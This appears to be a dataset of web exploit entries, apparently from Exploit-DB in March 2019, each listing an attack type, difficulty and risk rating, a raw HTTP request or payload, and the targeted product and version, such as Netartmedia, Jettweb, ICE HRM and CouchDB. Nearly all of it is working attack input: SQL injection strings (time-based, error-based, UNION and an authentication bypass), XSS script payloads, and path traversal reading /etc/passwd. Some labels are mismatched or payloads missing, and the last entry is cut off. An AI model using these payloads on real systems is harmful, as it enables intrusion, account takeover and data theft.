{"@class":"OUser","@version":0,"@rid":"#-1:-

1","name":"test<script>alert(1)</script>","password":"test","roles":[],"status":"ACTIVE"}

Target program: OrientDB; target environment: OrientDB 3.0.17 GA Community Edition

2019-03-13 46538 XSS (difficulty: Low, risk: Low) pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting

POST /10.0.100.24/haproxy/haproxy_listeners_edit.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-testContent-Type: application/x-www-form-urlencoded

Description="><script>alert("test")</script>

Target program: pfSense; target environment: pfSense 2.4.4-p1 (HAProxy Package 0.59_14)

2019-03-13 46537 LFI (difficulty: Medium, risk: Low) WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

Target program: WordPress Plugin; target environment: WordPress Plugin GraceMedia Media Player 1.0

2019-03-15 46549 XSS (difficulty: Low, risk: Medium) Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities

https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfai

lure.php?cn=gar&result=</font><script>alert(1);</script><font>

Vembu StoregridWeb Interface

VembuStoregrid Web

Interface4.4.0

2019-03-15 46548 SQL Injection (attack difficulty: Medium, attack risk: High)
ICE HRM 23.0 - Multiple Vulnerabilities

GET /icehrmv23OS/app/data.php?t=Employee&sm=%7B%22nationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22supervisor%22:[%22Employee%22,%22id%22,%22first_name%20last_name%22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_name%22,%22last_name%22,%22mobile_phone%22,%22department%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f

Target program: ICE HRM
Target environment: ICE HRM 23.0

2019-03-15 46545 SQL Injection (attack difficulty: Medium, attack risk: High)
NetData 1.13.0 - HTML Injection

GET /124.53.7.10/?username=test&password=passwordexample HTTP/1.1
Host: 124.53.7.10:5000
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:19999/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en;q=0.8

Target program: NetData
Target environment: NetData 1.13.0

2019-03-18 46555 SQL Injection (attack difficulty: Low, attack risk: High)
TheCarProject 2 - Multiple SQL Injection

GET /124.53.7.10/TheCarProject/cp/includes/loaditem.php?man_id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) HTTP/1.1
Content-Length: 364

Target program: TheCarProject
Target environment: TheCarProject 2

2019-03-19 46563 SQL Injection (attack difficulty: Medium, attack risk: Low)
Netartmedia Real Estate Portal 5.0 - SQL Injection

POST /124.53.7.10/index.php HTTP/1.1
Host: 124.53.7.10:5000
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data;
Content-Length: 873

ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)#

Target program: Netartmedia
Target environment: Netartmedia Real Estate Portal 5.0

2019-03-19 46562 SQL Injection (attack difficulty: Medium, attack risk: Low)
Netartmedia PHP Mall 4.1 - SQL Injection

(GET) id=1 AND SLEEP(5)&item=&lang=en&mod=details

(POST) Email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)AND 'tOoX'='tOoX&Password=g00dPa$$w0rD&lang=en

Target program: Netartmedia
Target environment: Netartmedia PHP Mall 4.1

2019-03-19 46560 SQL Injection (attack difficulty: Medium, attack risk: Low)
Netartmedia Event Portal 2.0 - 'Email' SQL Injection

Email='||(SELECT 0x59685353 FROM DUAL WHERE 7114=7114 AND SLEEP(5))||'

Target program: Netartmedia
Target environment: Netartmedia Event Portal 2.0

2019-03-19 46559 SQL Injection (attack difficulty: Low, attack risk: High)
eNdonesia Portal 8.7 - Multiple Vulnerabilities

/endonesia87/banners.php?op=click&bid=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

Target program: eNdonesia
Target environment: eNdonesia Portal 8.7

2019-03-19 46558 XSS (attack difficulty: Low, attack risk: Low)
MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting

name = <script>alert('XSS')</script>

Target program: MyBB
Target environment: MyBB Upcoming Events Plugin 1.32

2019-03-19 46557 XSS (attack difficulty: Low, attack risk: Medium)
Gila CMS 1.9.1 - Cross-Site Scripting

GET /10.0.100.24/?search=<--`<img/src=` onerror=confirm``> --!> HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: Gila
Target environment: Gila CMS 1.9.1

2019-03-20 46582 SQL Injection (attack difficulty: Low, attack risk: Medium)
Netartmedia Deals Portal - 'Email' SQL Injection

POST /10.0.100.24/loginaction.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

Target program: Netartmedia
Target environment: Netartmedia Deals Portal

2019-03-20 46579 SQL Injection (attack difficulty: Low, attack risk: Medium)
202CMS v10beta - Multiple SQL Injection

POST /10.0.100.24/202cms10beta/index.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

log_user=1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

Target program: 202CMS v10beta
Target environment: 202CMS v10beta

2019-03-20 46577 SQL Injection (attack difficulty: Low, attack risk: Low)
Netartmedia PHP Business Directory 4.2 - SQL Injection

POST /10.0.100.24/USERS/loginaction.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

Target program: Netartmedia
Target environment: Netartmedia PHP Business Directory 4.2

2019-03-20 46576 SQL Injection (attack difficulty: Low, attack risk: Medium)
Netartmedia PHP Dating Site - SQL Injection

POST /10.0.100.24/loginaction.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

Target program: Netartmedia
Target environment: Netartmedia PHP Dating Site

2019-03-20 46575 SQL Injection (attack difficulty: Low, attack risk: Medium)
Netartmedia Jobs Portal 6.1 - SQL Injection

POST /10.0.100.24/loginaction.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

Target program: Netartmedia
Target environment: Netartmedia Jobs Portal 6.1

2019-03-20 46574 SQL Injection (attack difficulty: Medium, attack risk: Medium)
Netartmedia PHP Real Estate Agency 4.0 - SQL Injection

POST /10.0.100.24/index.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1

Target program: Netartmedia
Target environment: Netartmedia PHP Real Estate Agency 4.0

2019-03-20 46573 SQL Injection (attack difficulty: Medium, attack risk: Medium)
Netartmedia PHP Car Dealer - SQL Injection

POST /10.0.100.24/index.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=date&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year=

Target program: Netartmedia
Target environment: Netartmedia PHP Car Dealer

2019-03-21 46590 SQL Injection (attack difficulty: High, attack risk: Medium)
Bootstrapy CMS - Multiple SQL Injection

POST /10.0.100.24/modules/forums/forum-thread.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z

email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=

body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&quote=1&submit=&thread-id=1

quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z

Target program: Bootstrapy
Target environment: Bootstrapy CMS

2019-03-21 46588 SQL Injection (attack difficulty: Low, attack risk: Low)
Placeto CMS Alpha v4 - 'page' SQL Injection

GET /10.0.100.24/placeto/admin/edit.php?page=key HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

page=JyI" AND 1647=1647 AND "svwN"="svwN

page=JyI" AND SLEEP(5) AND "uIvY"="uIvY

NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

Target program: Placeto
Target environment: Placeto CMS Alpha v4

2019-03-21 46587 SQL Injection (attack difficulty: Low, attack risk: Medium)
uHotelBooking System - 'system_page' SQL Injection

GET /10.0.100.24/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: uHotelBooking
Target environment: uHotelBooking System

2019-03-21 46586 SQL Injection (attack difficulty: Low, attack risk: Low)
The Company Business Website CMS - Multiple Vulnerabilities

user_name=VNfn' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--WMfV&user_password=&loggin=Psop

Target program: The Company Business Website CMS
Target environment: The Company Business Website CMS

2019-03-21 46583 SQL Injection (attack difficulty: Low, attack risk: Medium)
Netartmedia Vlog System - 'email' SQL Injection

POST /10.0.100.24/index.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password

Target program: Netartmedia
Target environment: Netartmedia Vlog System

2019-03-22 46593 SQL Injection (attack difficulty: Low, attack risk: Medium)
Inout Article Base CMS - SQL Injection

GET /10.0.100.24/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&u=test HTTP/1.1

Target program: Inout
Target environment: Inout Article Base CMS

2019-03-22 46592 SQL Injection (attack difficulty: Low, attack risk: Low)
Meeplace Business Review Script - 'id' SQL Injection

GET /10.0.100.24/ad/addclick.php?&id=1 RLIKE (SELECT * FROM(SELECT(SLEEP(5)))qcFZ) HTTP/1.1

Target program: Meeplace
Target environment: Meeplace Business Review Script

2019-03-22 46591 SQL Injection (attack difficulty: Low, attack risk: Medium)
Matri4Web Matrimony Website Script - Multiple SQL Injection

POST /10.0.100.24/simplesearch_results.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

Fage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0

age1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo

Target program: Matri4Web
Target environment: Matri4Web Matrimony Website Script

2019-03-25 46603 SQL Injection (attack difficulty: Medium, attack risk: Medium)
Zeeways Matrimony CMS - SQL Injection

POST /10.0.100.24/profile_list HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

up_cast=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),CHAR(48),CHAR(117),CHAR(107)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Target program: Zeeways
Target environment: Zeeways Matrimony CMS

2019-03-25 46602 SQL Injection (attack difficulty: Low, attack risk: Low)
Zeeways Jobsite CMS - 'id' SQL Injection

GET /10.0.100.24/news_details.php?id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)# HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: Zeeways
Target environment: Zeeways Jobsite CMS

2019-03-25 46599 SQL Injection (attack difficulty: Low, attack risk: Low)
Jettweb PHP Hazır Haber Sitesi Scripti V3 - SQL Injection

GET /10.0.100.24/fonksiyonlar.php?fgit=videoyorumlar&videoid=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL-- HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: Jettweb
Target environment: Jettweb PHP Hazır Haber Sitesi Scripti V3

2019-03-25 46598 SQL Injection (attack difficulty: Low, attack risk: Low)
Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)

POST /10.0.100.24/yonetim/admingiris.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

Username='=' 'or'Password='=' 'or'

Target program: Jettweb
Target environment: Jettweb PHP Hazır Haber Sitesi Scripti V2

2019-03-25 46597 SQL Injection (attack difficulty: Low, attack risk: Medium)
Jettweb PHP Hazır Haber Sitesi Scripti V1 - SQL Injection

GET /10.0.100.24/gallery.php?gallery_id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x63565549564d5a424e57746d6d62614e4f6e4a7559666a744d50557776636e4e6a6952504d494444,0x71626a7a71)-- HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: Jettweb
Target environment: Jettweb PHP Hazır Haber Sitesi Scripti V1

2019-03-25 46595 XSS (attack difficulty: Low, attack risk: Low)
Apache CouchDB 2.3.1 - Cross-Site Scripting

GET /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 6
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

Target program: Apache CouchDB
Target environment: Apache CouchDB 2.3.1

2019-03-26 46612 SQL Injection (attack difficulty: Low, attack risk: Low)
SJS Simple Job Script - SQL Injection

POST /10.0.100.24/searched HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test

Target program: SJS
Target environment: SJS Simple Job Script

2019-03-26 46612 XSS (attack difficulty: Low, attack risk: Low)
SJS Simple Job Script - Cross-Site Scripting

GET /10.0.100.24//jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype HTTP/1.1

Target program: SJS
Target environment: SJS Simple Job Script

2019-03-26 46611 Directory Traversal (attack difficulty: Low, attack risk: Low)
Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion

GET /PreviewHandler.ashx?path=\..\..\..\..\Python27\README.txt&filename=README.txt

Target program: Titan FTP Server
Target environment: Titan FTP Server Version 2019 Build 3505

2019-03-26 46612 SQL Injection (attack difficulty: Low, attack risk: Medium)
XooDigital - 'p' SQL Injection

POST /10.0.100.24/get_job_applications_ajax.php HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20

landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test

employerid=if(now()=sysdate(),sleep(0),0)

app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/

Target program: XooDigital
Target environment: XooDigital

2019-03-26 46609 SQL Injection (attack difficulty: Low, attack risk: Low)
XooGallery - Multiple SQL Injection

GET /10.0.100.24/gal.php?gal_id=29' AND 2692=2692 AND 'WCFf'='WCFf HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

photo_id=1' AND 5479=5479#

cat_id=1' AND 9338=9338 AND 'SZIH'='SZIH

p=-8412' OR 2597=2597#

Target program: XooGallery
Target environment: XooGallery

2019-03-26 46608 XSS (attack difficulty: Low, attack risk: Low)
Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting

POST /10.0.100.24/index.php? HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test
Content-Type: application/x-www-form-urlencoded

module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E

Target program: Rukovoditel
Target environment: Rukovoditel ERP & CRM 2.4.1

2019-03-26 46606 SQL Injection (attack difficulty: Low, attack risk: Low)
Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection

GET /10.0.100.24/m/katgetir.php?kat=1' OR NOT 1300=1300-- rwTf HTTP/1.1

Target program: Jettweb
Target environment: Jettweb Php Hazır İlan Sitesi Scripti V2

2019-03-27 46614 SQL Injection (attack difficulty: Medium, attack risk: Medium)
Jettweb Hazır Rent A Car Scripti V4 - SQL Injection

GET /10.0.100.24/admin/index.php?admin=vitestipi&tur=VitesTipi' AND 2211=2211 AND 'fVeE'='fVeE HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

admin=rez-gor&id=2 AND SLEEP(5)

admin=ozellikekle&itemid=1&ozellikdil=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&syf=ceviriguncelle&tur=VitesTipi

Target program: Jettweb
Target environment: Jettweb Hazır Rent A Car Scripti V4

2019-03-28 46624 SQL Injection (attack difficulty: Low, attack risk: Medium)
Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection

POST /10.0.100.24/fiyat-goster.html HTTP/1.1
Host: 10.0.100.24
